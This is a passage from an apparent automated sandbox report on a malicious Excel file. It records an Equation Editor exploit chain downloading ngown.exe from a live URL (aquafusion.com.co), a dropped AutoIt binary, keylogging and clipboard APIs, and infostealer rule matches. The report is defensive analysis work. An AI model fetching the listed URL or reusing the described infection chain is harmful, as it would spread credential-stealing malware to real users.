                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: Joe Sandbox ViewASN Name: GTDCOLOMBIASASCO GTDCOLOMBIASASCO
                  Source: global trafficHTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: aquafusion.com.coConnection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036A057D URLDownloadToFileW,2_2_036A057D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to behavior
                  Source: global trafficDNS traffic detected: DNS query: aquafusion.com.co
                  Source: EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exejjC:
                  Source: EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeurC:
                  Source: fryvcftyii.exe, 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, POq2Ux.cs.Net Code: _6JpPt
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00434164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00434164
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00433F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00433F66
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_0042001C
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0044CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0044CABC

                  System Summary

                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: This is a third-party compiled AutoIt script.5_2_003C3B3A
                  Source: fryvcftyii.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_215976d6-a
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e12675fd-8
                  Source: ngown[1].exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6341b053-a
                  Source: ngown[1].exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e1d9e07b-0
                  Source: fryvcftyii.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eb915769-6
                  Source: fryvcftyii.exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4ef33929-1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_0042A1EF
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00418310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00418310
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_004251BD
                  Source: TR-AHYO-12-13-2024.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe 4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe 4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003E8900 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003E0AE3 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: String function: 003C7DE1 appears 36 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042A06A GetLastError,FormatMessageW,5_2_0042A06A
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004181CB AdjustTokenPrivileges,CloseHandle,5_2_004181CB
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_004187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_004187E1
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_0042B333
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0043EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_0043EE0D
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_0042C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_0042C397
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_003C4E89
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TR-AHYO-12-13-2024.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR83AF.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: TR-AHYO-12-13-2024.xlam.xlsxReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
